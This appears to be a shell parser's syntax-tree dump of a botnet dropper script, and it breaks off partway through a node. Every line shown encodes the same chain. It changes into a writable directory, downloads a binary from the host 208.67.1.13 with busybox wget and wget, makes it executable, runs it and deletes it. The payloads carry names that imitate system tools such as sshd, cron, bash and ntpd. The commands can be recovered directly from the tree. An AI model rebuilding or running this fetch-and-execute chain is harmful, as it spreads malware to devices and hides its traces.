ListNode(lineno=2, pos=(12, 169), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 103), parts=[
    WordNode(lineno=2, pos=(67, 74), word='busybox'),
    WordNode(lineno=2, pos=(75, 79), word='wget'),
    WordNode(lineno=2, pos=(80, 103), word='http://208.67.1.13/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(103, 104)),
  CommandNode(lineno=2, pos=(105, 133), parts=[
    WordNode(lineno=2, pos=(105, 109), word='wget'),
    WordNode(lineno=2, pos=(110, 133), word='http://208.67.1.13/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(133, 134)),
  CommandNode(lineno=2, pos=(135, 148), parts=[
    WordNode(lineno=2, pos=(135, 140), word='chmod'),
    WordNode(lineno=2, pos=(141, 143), word='+x'),
    WordNode(lineno=2, pos=(144, 148), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(148, 149)),
  CommandNode(lineno=2, pos=(150, 156), parts=[
    WordNode(lineno=2, pos=(150, 156), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(156, 157)),
  CommandNode(lineno=2, pos=(158, 169), parts=[
    WordNode(lineno=2, pos=(158, 160), word='rm'),
    WordNode(lineno=2, pos=(161, 164), word='-rf'),
    WordNode(lineno=2, pos=(165, 169), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(170, 327), parts=[
  CommandNode(lineno=3, pos=(170, 177), parts=[
    WordNode(lineno=3, pos=(170, 172), word='cd'),
    WordNode(lineno=3, pos=(173, 177), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(178, 180)),
  CommandNode(lineno=3, pos=(181, 192), parts=[
    WordNode(lineno=3, pos=(181, 183), word='cd'),
    WordNode(lineno=3, pos=(184, 192), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(193, 195)),
  CommandNode(lineno=3, pos=(196, 203), parts=[
    WordNode(lineno=3, pos=(196, 198), word='cd'),
    WordNode(lineno=3, pos=(199, 203), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(204, 206)),
  CommandNode(lineno=3, pos=(207, 215), parts=[
    WordNode(lineno=3, pos=(207, 209), word='cd'),
    WordNode(lineno=3, pos=(210, 215), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(216, 218)),
  CommandNode(lineno=3, pos=(219, 223), parts=[
    WordNode(lineno=3, pos=(219, 221), word='cd'),
    WordNode(lineno=3, pos=(222, 223), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(223, 224)),
  CommandNode(lineno=3, pos=(225, 261), parts=[
    WordNode(lineno=3, pos=(225, 232), word='busybox'),
    WordNode(lineno=3, pos=(233, 237), word='wget'),
    WordNode(lineno=3, pos=(238, 261), word='http://208.67.1.13/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(261, 262)),
  CommandNode(lineno=3, pos=(263, 291), parts=[
    WordNode(lineno=3, pos=(263, 267), word='wget'),
    WordNode(lineno=3, pos=(268, 291), word='http://208.67.1.13/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(291, 292)),
  CommandNode(lineno=3, pos=(293, 306), parts=[
    WordNode(lineno=3, pos=(293, 298), word='chmod'),
    WordNode(lineno=3, pos=(299, 301), word='+x'),
    WordNode(lineno=3, pos=(302, 306), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(306, 307)),
  CommandNode(lineno=3, pos=(308, 314), parts=[
    WordNode(lineno=3, pos=(308, 314), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(314, 315)),
  CommandNode(lineno=3, pos=(316, 327), parts=[
    WordNode(lineno=3, pos=(316, 318), word='rm'),
    WordNode(lineno=3, pos=(319, 322), word='-rf'),
    WordNode(lineno=3, pos=(323, 327), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(328, 500), parts=[
  CommandNode(lineno=4, pos=(328, 335), parts=[
    WordNode(lineno=4, pos=(328, 330), word='cd'),
    WordNode(lineno=4, pos=(331, 335), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(336, 338)),
  CommandNode(lineno=4, pos=(339, 350), parts=[
    WordNode(lineno=4, pos=(339, 341), word='cd'),
    WordNode(lineno=4, pos=(342, 350), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(351, 353)),
  CommandNode(lineno=4, pos=(354, 361), parts=[
    WordNode(lineno=4, pos=(354, 356), word='cd'),
    WordNode(lineno=4, pos=(357, 361), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(362, 364)),
  CommandNode(lineno=4, pos=(365, 373), parts=[
    WordNode(lineno=4, pos=(365, 367), word='cd'),
    WordNode(lineno=4, pos=(368, 373), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(374, 376)),
  CommandNode(lineno=4, pos=(377, 381), parts=[
    WordNode(lineno=4, pos=(377, 379), word='cd'),
    WordNode(lineno=4, pos=(380, 381), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(381, 382)),
  CommandNode(lineno=4, pos=(383, 422), parts=[
    WordNode(lineno=4, pos=(383, 390), word='busybox'),
    WordNode(lineno=4, pos=(391, 395), word='wget'),
    WordNode(lineno=4, pos=(396, 422), word='http://208.67.1.13/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(422, 423)),
  CommandNode(lineno=4, pos=(424, 455), parts=[
    WordNode(lineno=4, pos=(424, 428), word='wget'),
    WordNode(lineno=4, pos=(429, 455), word='http://208.67.1.13/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(455, 456)),
  CommandNode(lineno=4, pos=(457, 473), parts=[
    WordNode(lineno=4, pos=(457, 462), word='chmod'),
    WordNode(lineno=4, pos=(463, 465), word='+x'),
    WordNode(lineno=4, pos=(466, 473), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(473, 474)),
  CommandNode(lineno=4, pos=(475, 484), parts=[
    WordNode(lineno=4, pos=(475, 484), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(484, 485)),
  CommandNode(lineno=4, pos=(486, 500), parts=[
    WordNode(lineno=4, pos=(486, 488), word='rm'),
    WordNode(lineno=4, pos=(489, 492), word='-rf'),
    WordNode(lineno=4, pos=(493, 500), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(501, 658), parts=[
  CommandNode(lineno=5, pos=(501, 508), parts=[
    WordNode(lineno=5, pos=(501, 503), word='cd'),
    WordNode(lineno=5, pos=(504, 508), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(509, 511)),
  CommandNode(lineno=5, pos=(512, 523), parts=[
    WordNode(lineno=5, pos=(512, 514), word='cd'),
    WordNode(lineno=5, pos=(515, 523), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(524, 526)),
  CommandNode(lineno=5, pos=(527, 534), parts=[
    WordNode(lineno=5, pos=(527, 529), word='cd'),
    WordNode(lineno=5, pos=(530, 534), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(535, 537)),
  CommandNode(lineno=5, pos=(538, 546), parts=[
    WordNode(lineno=5, pos=(538, 540), word='cd'),
    WordNode(lineno=5, pos=(541, 546), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(547, 549)),
  CommandNode(lineno=5, pos=(550, 554), parts=[
    WordNode(lineno=5, pos=(550, 552), word='cd'),
    WordNode(lineno=5, pos=(553, 554), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(554, 555)),
  CommandNode(lineno=5, pos=(556, 592), parts=[
    WordNode(lineno=5, pos=(556, 563), word='busybox'),
    WordNode(lineno=5, pos=(564, 568), word='wget'),
    WordNode(lineno=5, pos=(569, 592), word='http://208.67.1.13/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(592, 593)),
  CommandNode(lineno=5, pos=(594, 622), parts=[
    WordNode(lineno=5, pos=(594, 598), word='wget'),
    WordNode(lineno=5, pos=(599, 622), word='http://208.67.1.13/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(622, 623)),
  CommandNode(lineno=5, pos=(624, 637), parts=[
    WordNode(lineno=5, pos=(624, 629), word='chmod'),
    WordNode(lineno=5, pos=(630, 632), word='+x'),
    WordNode(lineno=5, pos=(633, 637), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(637, 638)),
  CommandNode(lineno=5, pos=(639, 645), parts=[
    WordNode(lineno=5, pos=(639, 645), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(645, 646)),
  CommandNode(lineno=5, pos=(647, 658), parts=[
    WordNode(lineno=5, pos=(647, 649), word='rm'),
    WordNode(lineno=5, pos=(650, 653), word='-rf'),
    WordNode(lineno=5, pos=(654, 658), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(659, 816), parts=[
  CommandNode(lineno=6, pos=(659, 666), parts=[
    WordNode(lineno=6, pos=(659, 661), word='cd'),
    WordNode(lineno=6, pos=(662, 666), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(667, 669)),
  CommandNode(lineno=6, pos=(670, 681), parts=[
    WordNode(lineno=6, pos=(670, 672), word='cd'),
    WordNode(lineno=6, pos=(673, 681), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(682, 684)),
  CommandNode(lineno=6, pos=(685, 692), parts=[
    WordNode(lineno=6, pos=(685, 687), word='cd'),
    WordNode(lineno=6, pos=(688, 692), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(693, 695)),
  CommandNode(lineno=6, pos=(696, 704), parts=[
    WordNode(lineno=6, pos=(696, 698), word='cd'),
    WordNode(lineno=6, pos=(699, 704), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(705, 707)),
  CommandNode(lineno=6, pos=(708, 712), parts=[
    WordNode(lineno=6, pos=(708, 710), word='cd'),
    WordNode(lineno=6, pos=(711, 712), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(712, 713)),
  CommandNode(lineno=6, pos=(714, 750), parts=[
    WordNode(lineno=6, pos=(714, 721), word='busybox'),
    WordNode(lineno=6, pos=(722, 726), word='wget'),
    WordNode(lineno=6, pos=(727, 750), word='http://208.67.1.13/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(750, 751)),
  CommandNode(lineno=6, pos=(752, 780), parts=[
    WordNode(lineno=6, pos=(752, 756), word='wget'),
    WordNode(lineno=6, pos=(757, 780), word='http://208.67.1.13/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(780, 781)),
  CommandNode(lineno=6, pos=(782, 795), parts=[
    WordNode(lineno=6, pos=(782, 787), word='chmod'),
    WordNode(lineno=6, pos=(788, 790), word='+x'),
    WordNode(lineno=6, pos=(791, 795), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(795, 796)),
  CommandNode(lineno=6, pos=(797, 803), parts=[
    WordNode(lineno=6, pos=(797, 803), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(803, 804)),
  CommandNode(lineno=6, pos=(805, 816), parts=[
    WordNode(lineno=6, pos=(805, 807), word='rm'),
    WordNode(lineno=6, pos=(808, 811), word='-rf'),
    WordNode(lineno=6, pos=(812, 816), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(817, 974), parts=[
  CommandNode(lineno=7, pos=(817, 824), parts=[
    WordNode(lineno=7, pos=(817, 819), word='cd'),
    WordNode(lineno=7, pos=(820, 824), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(825, 827)),
  CommandNode(lineno=7, pos=(828, 839), parts=[
    WordNode(lineno=7, pos=(828, 830), word='cd'),
    WordNode(lineno=7, pos=(831, 839), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(840, 842)),
  CommandNode(lineno=7, pos=(843, 850), parts=[
    WordNode(lineno=7, pos=(843, 845), word='cd'),
    WordNode(lineno=7, pos=(846, 850), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(851, 853)),
  CommandNode(lineno=7, pos=(854, 862), parts=[
    WordNode(lineno=7, pos=(854, 856), word='cd'),
    WordNode(lineno=7, pos=(857, 862), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(863, 865)),
  CommandNode(lineno=7, pos=(866, 870), parts=[
    WordNode(lineno=7, pos=(866, 868), word='cd'),
    WordNode(lineno=7, pos=(869, 870), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(870, 871)),
  CommandNode(lineno=7, pos=(872, 908), parts=[
    WordNode(lineno=7, pos=(872, 879), word='busybox'),
    WordNode(lineno=7, pos=(880, 884), word='wget'),
    WordNode(lineno=7, pos=(885, 908), word='http://208.67.1.13/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(908, 909)),
  CommandNode(lineno=7, pos=(910, 938), parts=[
    WordNode(lineno=7, pos=(910, 914), word='wget'),
    WordNode(lineno=7, pos=(915, 938), word='http://208.67.1.13/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(938, 939)),
  CommandNode(lineno=7, pos=(940, 953), parts=[
    WordNode(lineno=7, pos=(940, 945), word='chmod'),
    WordNode(lineno=7, pos=(946, 948), word='+x'),
    WordNode(lineno=7, pos=(949, 953), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(953, 954)),
  CommandNode(lineno=7, pos=(955, 961), parts=[
    WordNode(lineno=7, pos=(955, 961), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(961, 962)),
  CommandNode(lineno=7, pos=(963, 974), parts=[
    WordNode(lineno=7, pos=(963, 965), word='rm'),
    WordNode(lineno=7, pos=(966, 969), word='-rf'),
    WordNode(lineno=7, pos=(970, 974), word='wget'),
  ]),
])
ListNode(lineno=8, pos=(975, 1132), parts=[
  CommandNode(lineno=8, pos=(975, 982), parts=[
    WordNode(lineno=8, pos=(975, 977), word='cd'),
    WordNode(lineno=8, pos=(978, 982), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(983, 985)),
  CommandNode(lineno=8, pos=(986, 997), parts=[
    WordNode(lineno=8, pos=(986, 988), word='cd'),
    WordNode(lineno=8, pos=(989, 997), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(998, 1000)),
  CommandNode(lineno=8, pos=(1001, 1008), parts=[
    WordNode(lineno=8, pos=(1001, 1003), word='cd'),
    WordNode(lineno=8, pos=(1004, 1008), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1009, 1011)),
  CommandNode(lineno=8, pos=(1012, 1020), parts=[
    WordNode(lineno=8, pos=(1012, 1014), word='cd'),
    WordNode(lineno=8, pos=(1015, 1020), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1021, 1023)),
  CommandNode(lineno=8, pos=(1024, 1028), parts=[
    WordNode(lineno=8, pos=(1024, 1026), word='cd'),
    WordNode(lineno=8, pos=(1027, 1028), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1028, 1029)),
  CommandNode(lineno=8, pos=(1030, 1066), parts=[
    WordNode(lineno=8, pos=(1030, 1037), word='busybox'),
    WordNode(lineno=8, pos=(1038, 1042), word='wget'),
    WordNode(lineno=8, pos=(1043, 1066), word='http://208.67.1.13/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1066, 1067)),
  CommandNode(lineno=8, pos=(1068, 1096), parts=[
    WordNode(lineno=8, pos=(1068, 1072), word='wget'),
    WordNode(lineno=8, pos=(1073, 1096), word='http://208.67.1.13/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1096, 1097)),
  CommandNode(lineno=8, pos=(1098, 1111), parts=[
    WordNode(lineno=8, pos=(1098, 1103), word='chmod'),
    WordNode(lineno=8, pos=(1104, 1106), word='+x'),
    WordNode(lineno=8, pos=(1107, 1111), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1111, 1112)),
  CommandNode(lineno=8, pos=(1113, 1119), parts=[
    WordNode(lineno=8, pos=(1113, 1119), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1119, 1120)),
  CommandNode(lineno=8, pos=(1121, 1132), parts=[
    WordNode(lineno=8, pos=(1121, 1123), word='rm'),
    WordNode(lineno=8, pos=(1124, 1127), word='-rf'),
    WordNode(lineno=8, pos=(1128, 1132), word='cron'),
  ]),
])
ListNode(lineno=9, pos=(1133, 1285), parts=[
  CommandNode(lineno=9, pos=(1133, 1140), parts=[
    WordNode(lineno=9, pos=(1133, 1135), word='cd'),
    WordNode(lineno=9, pos=(1136, 1140), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1141, 1143)),
  CommandNode(lineno=9, pos=(1144, 1155), parts=[
    WordNode(lineno=9, pos=(1144, 1146), word='cd'),
    WordNode(lineno=9, pos=(1147, 1155), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1156, 1158)),
  CommandNode(lineno=9, pos=(1159, 1166), parts=[
    WordNode(lineno=9, pos=(1159, 1161), word='cd'),
    WordNode(lineno=9, pos=(1162, 1166), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1167, 1169)),
  CommandNode(lineno=9, pos=(1170, 1178), parts=[
    WordNode(lineno=9, pos=(1170, 1172), word='cd'),
    WordNode(lineno=9, pos=(1173, 1178), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1179, 1181)),
  CommandNode(lineno=9, pos=(1182, 1186), parts=[
    WordNode(lineno=9, pos=(1182, 1184), word='cd'),
    WordNode(lineno=9, pos=(1185, 1186), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1186, 1187)),
  CommandNode(lineno=9, pos=(1188, 1223), parts=[
    WordNode(lineno=9, pos=(1188, 1195), word='busybox'),
    WordNode(lineno=9, pos=(1196, 1200), word='wget'),
    WordNode(lineno=9, pos=(1201, 1223), word='http://208.67.1.13/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1223, 1224)),
  CommandNode(lineno=9, pos=(1225, 1252), parts=[
    WordNode(lineno=9, pos=(1225, 1229), word='wget'),
    WordNode(lineno=9, pos=(1230, 1252), word='http://208.67.1.13/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1252, 1253)),
  CommandNode(lineno=9, pos=(1254, 1266), parts=[
    WordNode(lineno=9, pos=(1254, 1259), word='chmod'),
    WordNode(lineno=9, pos=(1260, 1262), word='+x'),
    WordNode(lineno=9, pos=(1263, 1266), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1266, 1267)),
  CommandNode(lineno=9, pos=(1268, 1273), parts=[
    WordNode(lineno=9, pos=(1268, 1273), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1273, 1274)),
  CommandNode(lineno=9, pos=(1275, 1285), parts=[
    WordNode(lineno=9, pos=(1275, 1277), word='rm'),
    WordNode(lineno=9, pos=(1278, 1281), word='-rf'),
    WordNode(lineno=9, pos=(1282, 1285), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(1286, 1443), parts=[
  CommandNode(lineno=10, pos=(1286, 1293), parts=[
    WordNode(lineno=10, pos=(1286, 1288), word='cd'),
    WordNode(lineno=10, pos=(1289, 1293), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1294, 1296)),
  CommandNode(lineno=10, pos=(1297, 1308), parts=[
    WordNode(lineno=10, pos=(1297, 1299), word='cd'),
    WordNode(lineno=10, pos=(1300, 1308), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1309, 1311)),
  CommandNode(lineno=10, pos=(1312, 1319), parts=[
    WordNode(lineno=10, pos=(1312, 1314), word='cd'),
    WordNode(lineno=10, pos=(1315, 1319), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1320, 1322)),
  CommandNode(lineno=10, pos=(1323, 1331), parts=[
    WordNode(lineno=10, pos=(1323, 1325), word='cd'),
    WordNode(lineno=10, pos=(1326, 1331), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1332, 1334)),
  CommandNode(lineno=10, pos=(1335, 1339), parts=[
    WordNode(lineno=10, pos=(1335, 1337), word='cd'),
    WordNode(lineno=10, pos=(1338, 1339), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1339, 1340)),
  CommandNode(lineno=10, pos=(1341, 1377), parts=[
    WordNode(lineno=10, pos=(1341, 1348), word='busybox'),
    WordNode(lineno=10, pos=(1349, 1353), word='wget'),
    WordNode(lineno=10, pos=(1354, 1377), word='http://208.67.1.13/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1377, 1378)),
  CommandNode(lineno=10, pos=(1379, 1407), parts=[
    WordNode(lineno=10, pos=(1379, 1383), word='wget'),
    WordNode(lineno=10, pos=(1384, 1407), word='http://208.67.1.13/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1407, 1408)),
  CommandNode(lineno=10, pos=(1409, 1422), parts=[
    WordNode(lineno=10, pos=(1409, 1414), word='chmod'),
    WordNode(lineno=10, pos=(1415, 1417), word='+x'),
    WordNode(lineno=10, pos=(1418, 1422), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1422, 1423)),
  CommandNode(lineno=10, pos=(1424, 1430), parts=[
    WordNode(lineno=10, pos=(1424, 1430), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1430, 1431)),
  CommandNode(lineno=10, pos=(1432, 1443), parts=[
    WordNode(lineno=10, pos=(1432, 1434), word='rm'),
    WordNode(lineno=10, pos=(1435, 1438), word='-rf'),
    WordNode(lineno=10, pos=(1439, 1443), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1444, 1591), parts=[
  CommandNode(lineno=11, pos=(1444, 1451), parts=[
    WordNode(lineno=11, pos=(1444, 1446), word='cd'),
    WordNode(lineno=11, pos=(1447, 1451), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1452, 1454)),
  CommandNode(lineno=11, pos=(1455, 1466), parts=[
    WordNode(lineno=11, pos=(1455, 1457), word='cd'),
    WordNode(lineno=11, pos=(1458, 1466), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1467, 1469)),
  CommandNode(lineno=11, pos=(1470, 1477), parts=[
    WordNode(lineno=11, pos=(1470, 1472), word='cd'),
    WordNode(lineno=11, pos=(1473, 1477), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1478, 1480)),
  CommandNode(lineno=11, pos=(1481, 1489), parts=[
    WordNode(lineno=11, pos=(1481, 1483), word='cd'),
    WordNode(lineno=11, pos=(1484, 1489), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1490, 1492)),
  CommandNode(lineno=11, pos=(1493, 1497), parts=[
    WordNode(lineno=11, pos=(1493, 1495), word='cd'),
    WordNode(lineno=11, pos=(1496, 1497), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1497, 1498)),
  CommandNode(lineno=11, pos=(1499, 1533), parts=[
    WordNode(lineno=11, pos=(1499, 1506), word='busybox'),
    WordNode(lineno=11, pos=(1507, 1511), word='wget'),
    WordNode(lineno=11, pos=(1512, 1533), word='http://208.67.1.13/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1533, 1534)),
  CommandNode(lineno=11, pos=(1535, 1561), parts=[
    WordNode(lineno=11, pos=(1535, 1539), word='wget'),
    WordNode(lineno=11, pos=(1540, 1561), word='http://208.67.1.13/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1561, 1562)),
  CommandNode(lineno=11, pos=(1563, 1574), parts=[
    WordNode(lineno=11, pos=(1563, 1568), word='chmod'),
    WordNode(lineno=11, pos=(1569, 1571), word='+x'),
    WordNode(lineno=11, pos=(1572, 1574), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1574, 1575)),
  CommandNode(lineno=11, pos=(1576, 1580), parts=[
    WordNode(lineno=11, pos=(1576, 1580), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1580, 1581)),
  CommandNode(lineno=11, pos=(1582, 1591), parts=[
    WordNode(lineno=11, pos=(1582, 1584), word='rm'),
    WordNode(lineno=11, pos=(1585, 1588), word='-rf'),
    WordNode(lineno=11, pos=(1589, 1591), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1592, 1754), parts=[
  CommandNode(lineno=12, pos=(1592, 1599), parts=[
    WordNode(lineno=12, pos=(1592, 1594), word='cd'),
    WordNode(lineno=12, pos=(1595, 1599), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1600, 1602)),
  CommandNode(lineno=12, pos=(1603, 1614), parts=[
    WordNode(lineno=12, pos=(1603, 1605), word='cd'),
    WordNode(lineno=12, pos=(1606, 1614), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1615, 1617)),
  CommandNode(lineno=12, pos=(1618, 1625), parts=[
    WordNode(lineno=12, pos=(1618, 1620), word='cd'),
    WordNode(lineno=12, pos=(1621, 1625), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1626, 1628)),
  CommandNode(lineno=12, pos=(1629, 1637), parts=[
    WordNode(lineno=12, pos=(1629, 1631), word='cd'),
    WordNode(lineno=12, pos=(1632, 1637), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1638, 1640)),
  CommandNode(lineno=12, pos=(1641, 1645), parts=[
    WordNode(lineno=12, pos=(1641, 1643), word='cd'),
    WordNode(lineno=12, pos=(1644, 1645), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1645, 1646)),
  CommandNode(lineno=12, pos=(1647, 1684), parts=[
    WordNode(lineno=12, pos=(1647, 1654), word='busybox'),
    WordNode(lineno=12, pos=(1655, 1659), word='wget'),
    WordNode(lineno=12, pos=(1660, 1684), word='http://208.67.1.13/[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1684, 1685)),
  CommandNode(lineno=12, pos=(1686, 1715), parts=[
    WordNode(lineno=12, pos=(1686, 1690), word='wget'),
    WordNode(lineno=12, pos=(1691, 1715), word='http://208.67.1.13/[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1715, 1716)),
  CommandNode(lineno=12, pos=(1717, 1731), parts=[
    WordNode(lineno=12, pos=(1717, 1722), word='chmod'),
    WordNode(lineno=12, pos=(1723, 1725), word='+x'),
    WordNode(lineno=12, pos=(1726, 1731), word='[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1731, 1732)),
  CommandNode(lineno=12, pos=(1733, 1740), parts=[
    WordNode(lineno=12, pos=(1733, 1740), word='./[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1740, 1741)),
  CommandNode(lineno=12, pos=(1742, 1754), parts=[
    WordNode(lineno=12, pos=(1742, 1744), word='rm'),
    WordNode(lineno=12, pos=(1745, 1748), word='-rf'),
    WordNode(lineno=12, pos=(1749, 1754), word='[cpu]'),
  ]),
])
ListNode(lineno=13, pos=(1755, 1927), parts=[
  CommandNode(lineno=13, pos=(1755, 1762), parts=[
    WordNode(lineno=13, pos=(1755, 1757), word='cd'),
    WordNode(lineno=13, pos=(1758, 1762), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1763, 1765)),
  CommandNode(lineno=13, pos=(1766, 1777), parts=[
    WordNode(lineno=13, pos=(1766, 1768), word='cd'),
    WordNode(lineno=13, pos=(1769, 1777), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1778, 1780)),
  CommandNode(lineno=13, pos=(1781, 1788), parts=[
    WordNode(lineno=13, pos=(1781, 1783), word='cd'),
    WordNode(lineno=13, pos=(1784, 1788), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1789, 1791)),
  CommandNode(lineno=13, pos=(1792, 1800), parts=[
    WordNode(lineno=13, pos=(1792, 1794), word='cd'),
    WordNode(lineno=13, pos=(1795, 1800), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1801, 1803)),
  CommandNode(lineno=13, pos=(1804, 1808), parts=[
    WordNode(lineno=13, pos=(1804, 1806), word='cd'),
    WordNode(lineno=13, pos=(1807, 1808), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1808, 1809)),
  CommandNode(lineno=13, pos=(1810, 1849), parts=[
    WordNode(lineno=13, pos=(1810, 1817), word='busybox'),
    WordNode(lineno=13, pos=(1818, 1822), word='wget'),
